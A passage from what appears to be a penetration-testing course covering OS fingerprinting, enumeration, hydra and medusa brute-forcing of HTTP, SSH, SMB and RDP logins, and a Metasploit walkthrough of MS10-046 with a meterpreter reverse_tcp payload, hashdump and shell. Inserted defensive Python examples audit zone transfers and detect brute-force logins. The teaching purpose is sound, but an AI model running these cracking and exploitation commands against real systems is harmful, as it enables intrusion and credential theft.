3. Identifying the operating system

Many powerful tools and port-scanning techniques are available for finding open ports on the target system. Looking back, our first objective was a port scan to identify the TCP and UDP ports on the target host, and with that information we can ask which listening ports have weaknesses. But we need more information about the target: namely, its operating system.

a) Active OS Detection

The more detailed the information about the operating system, the more useful it is for analysing weaknesses. We can use banner grabbing, that is, trying to pull information from FTP, telnet, SMTP and HTTP services. This is the simplest way to discover the operating system and the version it is running. The proper technique, however, is stack fingerprinting. It is a very powerful technique that lets us identify the target operating system with a high degree of confidence. Stack fingerprinting requires at least one listening port on the target; nmap can still make a guess when no port is open.

Active OS detection sends packets to the target to identify detailed characteristics of its network stack, which allows us to guess the operating system. Because such packets must be sent, it is very easy to detect, so this is not the approach a hacker applies to an attack.

nmap with -O identifies the operating system.

b) Passive OS Detection

This uses passive stack fingerprinting, which is similar in concept to active stack fingerprinting. Instead of sending packets to the target, which is easily detected, the attacker quietly monitors network traffic to determine the operating system in use. By monitoring the traffic between different systems, we can identify their operating systems. The technique depends on being at a central position on the network, and on a switch port that allows packets to be captured.

Chapter 4: ENUMERATION

I. What is enumeration?

Enumeration is the next step in the process of gathering information about an organization. It takes place after scanning and is the process of collecting and analysing user names, machine names, shared resources and services. It also actively queries or connects to the target to obtain more meaningful information. Enumeration can be defined as the process of extracting the information obtained during scanning into an orderly system. The extracted information includes everything related to the target to be attacked, such as user names, host names, services and shares. Enumeration techniques are carried out from inside the environment; enumeration includes connecting to the system and directly pulling out information. The purpose of enumeration is to identify user and system accounts that can be used to hack a target. It is not necessary to find an administrator account, because we can raise the privileges of such an account up to the level that grants access to more accounts than were previously allowed.

II. Banner Grabbing

The most basic enumeration technique is banner grabbing. It can be defined simply as connecting to a remote application and observing its output. It gives a remote attacker a lot of information; at the very least we can identify the model of the running service, which in many cases is the starting point for researching its weaknesses.

Countermeasure: turn off unnecessary services. We can restrict access to the services with network access control.

III. Enumerating network services

1. HTTP fingerprinting

a) Telnet

TELNET (short for TerminaL NETwork) is a network protocol used on Internet connections or on connections to local area networks (LANs). The IETF document STD 8 (also known as RFC 854 and RFC 855) states: "The purpose of the TELNET protocol is to provide a fairly general, bi-directional, eight-bit byte oriented communications facility." TELNET is a client-server protocol built on TCP, and the client (user) side usually connects to port 23 of a server, which provides the application program that carries out the service.

Using telnet to learn about an open service port: a remote tool retrieves information through the telnet port, which most operating systems support.

    C:\>telnet www.google.com 80

b) Netcat

A tool that allows data to be written and read over the TCP and UDP protocols. Netcat can be used as a port scanner, backdoor, port redirector, port listener, and so on.

Using netcat from the command line:

- Connect mode: nc [-options] hostname port1[-port2]
- Listen mode: nc -l -p port [-options] [hostname] [port]

Examples:

Grabbing a server's banner:

    nc -n 192.168.10.102 80

Port scanning: run netcat with the -z option, for example to scan TCP ports 1 to 500 of host 192.168.10.102.

    nc -v www.google.com 80
    www.google.com [74.215.71.105] 80 (http) open

c) OpenSSL

OpenSSL is a collaborative effort to develop a full-featured open-source toolkit implementing the SSL protocols (version 2 and version 3) and the TLS protocol (version 1), managed by a worldwide community of volunteers who use the Internet to communicate and to develop the OpenSSL toolkit and its related documentation.

Most software such as IMAP and POP, Samba, OpenLDAP, FTP and Apache requires users to be authenticated before they may use the service. By default, however, the user name and password are transmitted as plain text, so they can be read or altered by a third party. Encryption techniques such as SSL guarantee the confidentiality and integrity of the data; with this technique, information sent over the network is encrypted end to end. Once OpenSSL is installed on a Linux server we can use it as a third-party tool that lets other applications use SSL.

OpenSSL is a cryptographic toolkit implementing the SSL and TLS network protocols and the related cryptographic standards. The openssl program is a command-line tool for using the cryptographic functions of OpenSSL's crypto library from the shell. OpenSSL's libraries provide cryptographic functions for applications such as secure web servers.

It is open-source software that can be used for both commercial and non-commercial purposes, with strong encryption available worldwide; it supports the SSLv2, SSLv3 and TLSv1 protocols, both RSA and Diffie-Hellman ciphers, and DSO. It supports OpenSSL and RSAref, improves passphrase handling for private keys, offers X.509 certificate-based authentication for both client and server, supports X.509 certificate revocation lists, and allows per-URL tuning of the SSL handshake parameters.

2. DNS Enumeration

DNS enumeration is the process of locating all the DNS servers of an organization and their corresponding records. A company may have both internal and external DNS servers that can yield information such as user names, computer names and IP addresses of potential target systems. Many tools can be used to obtain information for DNS enumeration; examples include nslookup, dig, the American Registry for Internet Numbers (ARIN) and Whois. To enumerate DNS, we must understand DNS and how it works, and we must know the DNS record types. The list of DNS record types gives an overview of the resource record types (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database of information associated with Internet domain names and addresses. In these name servers, different record types serve different purposes. The following list describes the common DNS record types and their uses:

A (address): maps a host name to an IP address
SOA (Start of Authority): identifies the DNS server responsible for the domain's information
CNAME (canonical name): provides additional names or aliases for an address record
MX (mail exchange): identifies the mail servers for the domain
SRV (service): identifies services such as directory services
PTR (pointer): maps an IP address to a host name
NS (name server): identifies other name servers for the domain

A DNS zone transfer is normally used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server performs a specific zone transfer request against a name server. If the name server allows zone transfers to take place, all the DNS names and IP addresses hosted by that name server are returned in human-readable ASCII text.

Nslookup

We can also run the command directly as follows:

    nslookup -type=any tuoitre.vn

type is the record type, as listed above: NS (name server), MX (mail exchange), any (all).
tuoitre.vn: a domain
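Because an open zone transfer returns the whole zone to anyone who asks, an administrator should verify that their own name servers refuse AXFR. The following added example (not from the original document) builds the DNS query by hand so the record type codes listed above are visible, and classifies the server's first reply; the server and zone names are placeholders, and the network check should only be pointed at servers you are responsible for.

```python
"""Audit whether a name server hands out the whole zone on an AXFR request.

Added example, not from the original document. The DNS query is built by hand
so the wire format and the record type numbers are visible; check_zone_transfer()
needs network access to the server being audited (use it only on servers you
are responsible for), while the builder and parser run offline and are tried on
a constructed response. The hostnames and zone used below are placeholders.
"""
import socket
import struct

# Resource record type codes (RFC 1035; SRV from RFC 2782).
RECORD_TYPES = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "PTR": 12, "MX": 15,
                "SRV": 33, "AXFR": 252, "ANY": 255}
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
          4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(name):
    """'example.com.' -> b'\\x07example\\x03com\\x00' (length-prefixed labels)."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(name, rtype, txid=0x1234):
    """12-byte header + one question; flags are 0 (AXFR is not recursive)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", RECORD_TYPES[rtype], 1)


def parse_header(message):
    """Return the DNS header fields needed to judge the answer."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", message[:12])
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "rcode": RCODES.get(flags & 0x000F, str(flags & 0x000F)), "answers": an}


def classify_axfr_reply(message):
    """'allowed' if the first AXFR message carries records, 'refused' if the
    server answered REFUSED/NOTAUTH, otherwise 'unknown:<rcode>'."""
    h = parse_header(message)
    if h["rcode"] in ("REFUSED", "NOTAUTH"):
        return "refused"
    if h["rcode"] == "NOERROR" and h["answers"] > 0:
        return "allowed"
    return "unknown:" + h["rcode"]


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the reply was complete")
        buf += chunk
    return buf


def check_zone_transfer(server, zone, timeout=5.0):
    """Send an AXFR for `zone` to `server` over TCP 53 and classify the first reply."""
    query = build_query(zone, "AXFR")
    with socket.create_connection((server, 53), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(query)) + query)   # DNS over TCP is length-prefixed
        length, = struct.unpack("!H", _recv_exact(sock, 2))
        return classify_axfr_reply(_recv_exact(sock, length))


def constructed_reply(zone, rcode, answer_count, txid=0x1234):
    """Header + echoed question of an AXFR reply (constructed for the demo; the
    records themselves are omitted since classification reads only the header).
    QR and AA bits are set as an authoritative server would."""
    header = struct.pack("!HHHHHH", txid, 0x8400 | rcode, 1, answer_count, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", RECORD_TYPES["AXFR"], 1)


if __name__ == "__main__":
    # Against your own server: check_zone_transfer("ns1.example.com", "example.com")
    print(build_query("example.com", "AXFR").hex())
    print(classify_axfr_reply(constructed_reply("example.com", 5, 0)))
    print(classify_axfr_reply(constructed_reply("example.com", 0, 7)))
```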

3. NetBIOS name

NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a local area network. Strictly an API, NetBIOS is not a network protocol. Older operating systems ran NetBIOS over IEEE 802.2 and IPX/SPX using the NetBIOS Frames (NBF) and NetBIOS over IPX/SPX (NBX) protocols respectively. In modern networks, NetBIOS normally runs over TCP/IP via the NetBIOS over TCP/IP (NBT) protocol. This results in each computer on the network having both a NetBIOS name and an IP address corresponding to a (possibly different) host name.

A NetBIOS name is a naming mechanism for the resources in a system with a flat name space (there is no notion of hierarchy).

Chapter 5: PASSWORD CRACKING

I. Introduction

Password cracking is the process of finding or recovering passwords for a variety of purposes. Its goal is to let a user recover a forgotten administrative password, or to gain unauthorized access to a system.

II. Password Cracking Techniques

1. Dictionary Attacks/Hybrid Attacks

These attacks use a ready-made dictionary file containing hashes, compare them with the hash of the password, and recover the plain-text password when the hashes match. We can also add to or reverse the words in the dictionary (hybrid attacks). This approach works well when the password consists of common words; it is fast, and its success rate depends on the dictionary.

2. Brute Forcing Attacks

Every combination of all characters is hashed and compared. Success is certain given enough time, but cracking takes a very long time when the password is long and complex; it is only good for short passwords.

3. Syllable Attacks/Pre-Computed Hashes

Combine the two methods above by pre-computing the hashes of all character combinations, so that only comparisons are needed while cracking. Cracking takes only a few minutes when the hashes are already available.
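The three techniques above all hinge on one property of the password store: a precomputed table is only useful when the stored hash is unsalted. The following added example (not from the original document) builds a small hybrid-dictionary table, shows that it recovers an unsalted hash instantly, and shows that a per-account salt with PBKDF2 forces every candidate to be re-hashed for each account; the wordlist, the "leaked" hashes and the reduced iteration count are constructed for the demonstration.

```python
"""Why dictionary/hybrid lookups against precomputed hashes work on unsalted
password stores and fail once each password is salted and stretched.

Added example, not from the original document. The wordlist, the "leaked"
hashes and the iteration count are constructed for the demonstration (real
deployments use far more PBKDF2 iterations); only hashlib/hmac/os are used.
"""
import hashlib
import hmac
import os

DEMO_ITERATIONS = 10_000          # kept small so the demo runs quickly


def hybrid_variants(word):
    """A dictionary word plus the simple manglings a hybrid attack adds:
    capitalisation, reversal and a single appended digit."""
    yield word
    yield word.capitalize()
    yield word[::-1]
    for digit in "0123456789":
        yield word + digit


def unsalted_hash(password):
    """The weak storage form: one unsalted SHA-256 of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_precomputed_table(wordlist):
    """Hash every candidate once; the table is then reused against every leaked hash."""
    return {unsalted_hash(c): c for word in wordlist for c in hybrid_variants(word)}


def lookup_unsalted(table, digest):
    """Recover an unsalted password by table lookup: no hashing at crack time."""
    return table.get(digest)


def salted_hash(password, salt, iterations=DEMO_ITERATIONS):
    """The defended storage form: per-account random salt plus PBKDF2 stretching."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def verify_salted(password, salt, digest, iterations=DEMO_ITERATIONS):
    """Constant-time comparison, as a login routine should use."""
    return hmac.compare_digest(salted_hash(password, salt, iterations), digest)


def guess_salted(wordlist, salt, digest, iterations=DEMO_ITERATIONS):
    """Against a salted hash the precomputed table is useless: every candidate
    must be re-hashed with this account's salt. Returns (match, hashes_computed)."""
    computed = 0
    for word in wordlist:
        for candidate in hybrid_variants(word):
            computed += 1
            if verify_salted(candidate, salt, digest, iterations):
                return candidate, computed
    return None, computed


# Constructed data: a small w ordlist and two leaked hashes of the same weak password.
WORDLIST = ["athena", "backtrack", "password"]
TABLE = build_precomputed_table(WORDLIST)
LEAKED_UNSALTED = unsalted_hash("athena1")
ACCOUNT_SALT = os.urandom(16)
LEAKED_SALTED = salted_hash("athena1", ACCOUNT_SALT)

if __name__ == "__main__":
    print("table entries:", len(TABLE))
    print("unsalted lookup:", lookup_unsalted(TABLE, LEAKED_UNSALTED))
    print("table vs salted:", lookup_unsalted(TABLE, LEAKED_SALTED))
    print("salted guess:", guess_salted(WORDLIST, ACCOUNT_SALT, LEAKED_SALTED))
```

With one salt per account the table-building cost is paid again for every account, and the PBKDF2 iteration count multiplies that cost further.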

III. Common Attack Types

1. Active Password Cracking

Find a real username, then try passwords for that username. The process can be automated to speed up the search.

Active password cracking attacks include:

o Password guessing: a dictionary of words and common passwords is assembled and every combination is tried to crack the password. This type of attack takes a lot of time and network bandwidth and is easily detected.

o Trojan/Spyware/Keylogger: background programs that let the attacker record every key pressed (keylogger), secretly gather information about individuals or organizations (spyware), or, with the help of a trojan, gain access to stored passwords, read private documents and delete files.

2. Passive Password Cracking

Capture the log-in process on the wire and break the password offline (sniffing, MITM).

These attacks include:

o Wire sniffing: the attacker runs packet-sniffing tools on the LAN to access and record live network traffic. The captured data may include passwords sent to remote systems in Telnet, FTP and rlogin sessions and in e-mail sent and received.

o Man-in-the-Middle (MITM) and replay attacks: in an MITM attack the attacker gains access to the communication channel between the victim and the server to look for information; in a replay attack, packets and authentication tokens are captured with a sniffer and reused.

3. Offline Password Cracking

Gain physical access to the victim's computer and copy the files that store the credentials, for example the SAM database on Windows (%systemroot%/system32/config) or /root/passwd on Linux. John can then be used to recover the plain-text password.

IV. Password Cracking Tools

1. Hydra

a) Introduction

Hydra is a very fast network logon cracker that supports many different protocols and services.

Hydra is a parallelized logon cracker, meaning that it runs several tasks at the same time so that cracking finishes faster.

The tool lets researchers and security consultants show how easy it would be to gain unauthorized remote access to a system.

b) Usage

The general syntax of Hydra is:

    hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t TASKS] [-w WAIT] [server | IP] [service://server[:port]]

Example:

    hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1

Where:

-f: finish: stop as soon as the first valid username/password pair is found
-L: file of usernames (-l for a single username)
-P: file of passwords (-p for a single password)
192.168.10.1: the IP address whose logon password is to be cracked
http-get: the HTTP service on port 80 (http may be replaced by http-get or http-head)
http://192.168.10.1: the web page to crack

2. Medusa

a) Introduction

Medusa can be used for fast, parallel, modular brute-force logon attacks. Its aim is to support as many services that allow remote authentication as possible.

Medusa is designed around three characteristics:

Thread-based parallel testing: tests can run against multiple hosts, usernames and passwords at once.

Modular design: each service exists as an independent module file (.mod). No changes to the core application are needed to extend the list of services supported for brute forcing.

b) Usage

Syntax:

    medusa [-h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] -M module [OPT]

-h host or IP address, -H a file listing hosts
-u username, -U a file of usernames
-p password, -P a file of passwords
-C a file combining host, username and password in the form host:username:password
-M module is mandatory and is followed by the name of a supported module. To list all modules, type: medusa -d; for detailed usage of a given module: medusa -M module_name -q

V. Password Cracking on Specific Protocols

1. HTTP (HyperText Transfer Protocol)

a) Concept

This is the protocol for transferring hypertext; it is commonly used for Web applications (World Wide Web, WWW) and its default port is 80.

b) HTTP has two authentication schemes:

Basic access authentication: the method by which a web browser or other program supplies a username and password when asked. It is supported by all web browsers; however, both the username and the password are sent as plain text, so it is little used in practice. Logging in to a router is a typical example.

We can capture it with Wireshark:

As the capture shows, the username and password obtained are admin:12345

Digest access authentication: one of the agreed methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to the sensitive information before sending it over the network.

c) Cracking HTTP passwords

We can use nmap (Network Mapper) to scan for open ports:

Open the browser to test the authentication process. Pressing the Cancel button gives the message:

Open a Terminal on BackTrack 5 and type:

    hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1

Where:

-f: finish: stop as soon as the first valid username/password pair is found
-L: file of usernames (-l for a single username)
-P: file of passwords (-p for a single password)
192.168.10.1: the IP address whose logon password is to be cracked
http-get: the HTTP service on port 80 (http may be replaced by http-get or http-head)
http://192.168.10.1: the web page to crack

Or:

    medusa -h 192.168.10.1 -U login.txt -P password -M http

Where:

-h: host or IP address whose logon password is to be cracked
-U: file of usernames (-u for a single username)
-P: file of passwords (-p for a single password)
-M http: the protocol to crack; M is short for module

Then go back to the web browser and enter the username and password that were found:

2. SSH (Secure Shell)

a) Concept

SSH is a network protocol for secure data communication, remote shell services or command execution, and other secure network services between networked computers. It connects a server and a client (running SSH server and SSH client programs) through a secure channel over an insecure network.

The best-known application of the protocol is access to shell accounts on Unix-like operating systems (Linux). It was designed as a replacement for insecure protocols such as telnet, rsh and rexec, where the password is sent as plain text and can easily be read.

SSH runs on TCP port 22.

b) Cracking passwords over SSH

Check whether the ssh service is running:

With hydra:

    hydra -f -L login.txt -P password.txt 192.168.10.101 ssh

With Medusa:

    medusa -h 192.168.10.101 -U login.txt -P password.txt -M ssh

And this is how to log in to the Nokia N900 device remotely with the username and password just found:

For example, checking the network interfaces remotely:
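The hydra and medusa runs in the HTTP and SSH sections above leave a very visible trace on the server: a burst of 401 responses in the web server log and a burst of "Failed password" lines in auth.log, often cycling through a list of user names. The following added example (not from the original document) parses both log formats and reports such bursts per source address, and also decodes the page's captured Basic credential to show that it is merely base64-encoded; the log lines, host names, addresses and year are constructed.

```python
"""Spot password-guessing runs against HTTP Basic auth and SSH in server logs,
and show that a Basic credential is only base64-encoded.

Added example, not from the original document. The log lines are constructed
to look like an Apache access log and a Linux auth.log while a tool such as
hydra or medusa hammers the login; host names, addresses and the year are
placeholders (syslog lines carry no year, so one is assumed).
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                    # failed logins from one source...
FAIL_WINDOW = timedelta(seconds=60)   # ...within this window
LOG_YEAR = 2012                       # assumed year for syslog timestamps

APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^ \]]+) [^\]]*\] "[^"]*" (?P<status>\d{3}) ')
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for '
    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')


def decode_basic(header_value):
    """'Basic YWRtaW46MTIzNDU=' -> ('admin', '12345'): base64 is not encryption."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def parse_failed_login(line):
    """Return (timestamp, source_ip, service, user) for a failed login, else None."""
    m = APACHE_RE.match(line)
    if m:
        if m.group("status") != "401":
            return None
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S")
        user = None if m.group("user") == "-" else m.group("user")   # %u may be "-"
        return ts, m.group("ip"), "http", user
    m = SSHD_RE.match(line)
    if m:
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=LOG_YEAR)
        return ts, m.group("ip"), "ssh", m.group("user")
    return None


def detect_bruteforce(lines, threshold=FAIL_THRESHOLD, window=FAIL_WINDOW):
    """Group failures per (source, service) and report bursts that reach the threshold."""
    failures = defaultdict(list)
    for line in lines:
        event = parse_failed_login(line)
        if event:
            ts, ip, service, user = event
            failures[(ip, service)].append((ts, user))
    findings = []
    for (ip, service), events in failures.items():
        events.sort(key=lambda e: e[0])
        for i, (start, _) in enumerate(events):
            burst = [e for e in events[i:] if e[0] - start <= window]
            if len(burst) >= threshold:
                findings.append({"source": ip, "service": service, "failures": len(burst),
                                 "users": sorted({u for _, u in burst if u}),
                                 "first": burst[0][0], "last": burst[-1][0]})
                break                          # one finding per (source, service)
    return findings


# Constructed log excerpt: a guessing run against Basic auth (six 401s, then
# the successful guess), one mistyped password from a legitimate user, a
# guessing run against sshd cycling through user names, and a normal login.
SAMPLE_LOG = """\
192.168.10.55 - admin [12/Sep/2012:10:15:01 +0700] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
192.168.10.55 - admin [12/Sep/2012:10:15:01 +0700] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
192.168.10.55 - root [12/Sep/2012:10:15:02 +0700] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
192.168.10.55 - root [12/Sep/2012:10:15:02 +0700] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
192.168.10.55 - admin [12/Sep/2012:10:15:03 +0700] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
192.168.10.55 - root [12/Sep/2012:10:15:03 +0700] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
192.168.10.55 - admin [12/Sep/2012:10:15:04 +0700] "GET / HTTP/1.0" 200 1532 "-" "Mozilla/4.0 (Hydra)"
192.168.10.20 - - [12/Sep/2012:10:16:40 +0700] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.10.20 - admin [12/Sep/2012:10:16:52 +0700] "GET / HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
Sep 12 10:20:01 n900 sshd[2231]: Failed password for root from 192.168.10.55 port 40122 ssh2
Sep 12 10:20:01 n900 sshd[2233]: Failed password for invalid user admin from 192.168.10.55 port 40123 ssh2
Sep 12 10:20:02 n900 sshd[2235]: Failed password for root from 192.168.10.55 port 40124 ssh2
Sep 12 10:20:02 n900 sshd[2237]: Failed password for invalid user test from 192.168.10.55 port 40125 ssh2
Sep 12 10:20:03 n900 sshd[2239]: Failed password for root from 192.168.10.55 port 40126 ssh2
Sep 12 10:20:03 n900 sshd[2241]: Failed password for user from 192.168.10.55 port 40127 ssh2
Sep 12 10:20:04 n900 sshd[2243]: Accepted password for user from 192.168.10.55 port 40128 ssh2
Sep 12 11:02:10 n900 sshd[2300]: Failed password for user from 192.168.10.33 port 41000 ssh2
Sep 12 11:02:15 n900 sshd[2302]: Accepted password for user from 192.168.10.33 port 41001 ssh2
"""

if __name__ == "__main__":
    print(decode_basic("Basic YWRtaW46MTIzNDU="))
    for finding in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(finding)
```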

3. SMB (Server Message Block)

a) Concept

SMB, also known as the Common Internet File System (CIFS), operates at the application layer of the OSI model and is commonly used to provide shared access to files, printers and various other communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most uses of SMB involve Microsoft Windows.

SMB can run over the session layer or lower:

o directly over TCP port 445;
o through NetBIOS (which provides many application-layer services in the OSI model, allowing applications on separate computers to communicate with each other over a LAN) on UDP ports 137 and 138 and TCP ports 137 and 139.

b) Cracking SMB passwords

Scan to see whether any machine is running the smb service on port 445:

With Hydra, type:

    hydra -f -L login.txt -P password.txt 192.168.10.100 smb

With Medusa, type:

    medusa -h 192.168.10.100 -U login.txt -P password.txt -M smbnt

And this is how we use the username and password just found:

4. RDP (Remote Desktop Protocol)

a) Concept

RDP is a proprietary communication protocol developed by Microsoft that gives a user a graphical interface to another computer. Microsoft currently refers to its official RDP server software as Remote Desktop Services, formerly Terminal Services, and to the client software as Terminal Services Client.

When connecting to a remote computer, we are asked for a matching user name and password. Cracking the RDP password is therefore necessary if we want access without the user's consent.

RDP runs on TCP port 3389.

b) Cracking RDP passwords

Scan the computers to see whether port 3389 is open:

With Hydra:

    hydra -f -L login.txt -P password.txt 192.168.10.100 rdp -t 4 -w 1

Medusa does not support the RDP protocol directly. However, we can use the wrapper module with the rdesktop script, as follows:

    medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m "ARGS:-u %U -p - %H" -h 192.168.10.100 -U login.txt -P password.txt

Even so, the program does not work quite correctly and takes a lot of time, because the attacker has to enter each password one by one.

This is how rdesktop is used to control the remote computer with the username and password found:

Chapter 6: SYSTEM HACKING

I. INTRODUCTION TO METASPLOIT

1. Introduction

Metasploit is a computer security project that provides information about security vulnerabilities and aids penetration testing and the development of network intrusion detection systems. Its best-known sub-project is the Metasploit Framework.

The Metasploit Framework is an environment for testing, attacking and exploiting flaws in services. Metasploit was built in the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows and MacOS. The program can be downloaded from www.metasploit.com

The current version of Metasploit is 4.4.

2. Components of Metasploit

Metasploit offers several user interfaces:

Console interface: uses the msfconsole command. The msfconsole interface uses command lines for configuration and testing, which is faster and more flexible.
Web interface: uses msfweb, interacting with the user through a web interface.
Command line interface: uses msfcli.

Environment:

Global environment: managed with the two commands setg and unsetg; options set here are global and are applied to all exploit modules.
Temporary environment: managed with the two commands set and unset; this environment applies only to the currently loaded exploit module and does not affect other exploit modules.

We can save the environment we have configured with the save command. The environment is saved in ./msf/config and is loaded again when the user interface starts.

3. Using the Metasploit Framework

a) Choosing an exploit module

Choose the vulnerable program or service that Metasploit supports exploiting:

show exploits: list the exploit modules the framework supports
use exploit_name: select an exploit module
info exploit_name: show information about an exploit module

We should regularly update the service vulnerabilities and modules from www.metasploit.com, or with the msfupdate command, or with svn update in /opt/metasploit/msf3/

b) Configuring the chosen exploit module

show options: identify which options need to be configured
set: configure the module's options

Some modules have advanced options, which we can view with the command show advanced

c) Verifying the configured options

check: check whether the options have been set correctly.

d) Choosing the target

Choose the operating system to run against:

show targets: the targets the module provides
set: choose a target

e.g. msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

e) Choosing the payload

The payload is the code that runs on the remote system; it is the part of a computer virus that executes malicious code.

show payloads: list the payloads for the current exploit module
info payload_name: show detailed information about a payload
set payload payload_name: select the payload by module name. After choosing a payload, use show options to view the payload's options
show advanced: view the payload's advanced options

f) Running the exploit

exploit: the command that executes the payload code. The payload then gives us information about the exploited system.

4. Introduction to the Meterpreter payload

Meterpreter, short for Meta-Interpreter, is an advanced payload included in the Metasploit Framework. Its purpose is to provide command sets for exploiting and attacking remote computers. It was written by the developers as shared object (DLL) files. Meterpreter and its extensions are executed in memory and are never written to disk, so they can evade detection by antivirus software.

Meterpreter provides a set of commands we can use on remote computers:

Fs (Filesystem): provides interaction with the file system
Net: lets us view the remote machine's network information such as IP and route table
Process: lets us interact with processes on the remote machine
Sys: lets us view the remote machine's system information and environment

a) Using the Fs module

cd directory: like the cd command of the command line, changes the working directory
getcwd: shows the current working directory
ls: lists directories and files
upload src1 [src2 ...] dst: uploads files from src to dst.
download src1 [src2 ...] dst: downloads files from src to dst.

b) Using the Net module

ipconfig: shows the configuration of the remote computer's network interfaces
route: shows the remote machine's routing table

c) Using the Process module

execute -f file [ -a args ] [ -Hc ]: the execute command creates a new process on the remote machine and uses that process to exploit data
kill pid1 pid2 pid3: cancels or terminates processes running on the remote machine
ps: lists the remote machine's processes

d) Using the Sys module

getuid: shows the current username on the remote machine
sysinfo: shows information about the victim computer: operating system, version, 32-bit or 64-bit platform

5. Countermeasures

Regularly apply Microsoft's patches. For example, to stop Metasploit from exploiting the Lsass_ms04_011 flaw, we must apply Microsoft's patch. According to Microsoft's assessment this is a critical flaw, present on almost all Windows operating systems. We should use hotfix number 835732 to fix it.

II. Vulnerability MS10-046 (2286198)

1. Introduction

This is a very serious Windows Shell flaw affecting all the listed operating systems; it allows an attacker to take complete control of Windows and execute code remotely. The flaw was discovered in June 2010 and Microsoft released a patch in August 2010.

The dangerous flaw lies in Windows "shortcut" files (*.lnk), which are usually found on the desktop or in the Start menu. By creating a shortcut file that embeds malicious code, a hacker can have that code executed automatically when the user views the shortcut or the contents of a folder containing the malicious shortcut.

The affected Windows versions are:

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems*
Windows Server 2008 R2 for Itanium-based Systems

2. Attack steps

After booting BackTrack and logging in successfully, open a Terminal:

Then type msfconsole and press Enter:

To use the ms10-046 exploit module, type search ms10-046 and press Enter

Then type:

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

and press Enter

Use the command show options to see the parameters that must be set before the attack can proceed:

o SRVHOST: the attacker's machine address, which listens for victims connecting to it
o SRVPORT: the listening port, http (80) by default

We then run:

o set PAYLOAD windows/meterpreter/reverse_tcp
o set SRVHOST 192.168.1.200
o set LHOST to the IP address: set LHOST 192.168.1.200. LHOST is a parameter of the PAYLOAD we just set above.

exploit starts the listening server on the attacking machine

On the victim's computer, create a shortcut by right-clicking the Desktop -> New -> Shortcut

Type the attacking machine's address into "Type the location of the item": http://192.168.1.200/anything and click Next

Give the newly created shortcut a name and click Finish. Then open the shortcut:

After a moment, on the attacking machine we get:

Use the sessions command to view the sessions Metasploit currently holds:

To interact with a session, run: sessions -i 1 (1 is the session id)

From now on everything becomes easier, because the attacker controls the victim machine with full privileges. For example:

The sysinfo command retrieves information about the victim machine:

The hashdump command retrieves the users' passwords in hashed form

A very useful command for using cmd (the command line): shell

3. Countermeasures

Regularly apply Windows patches to avoid being exploited by hackers.

The patch, code-named KB2286198, contains a new version of the Shell32.dll file; this is an important update. Shell32.dll is a very important library file in Windows, containing a number of Windows Shell API functions. If Shell32.dll is faulty or wrongly updated, the computer will show the "blue screen of death".

    III. The BYPASSUAC vulnerability

    1. Introduction

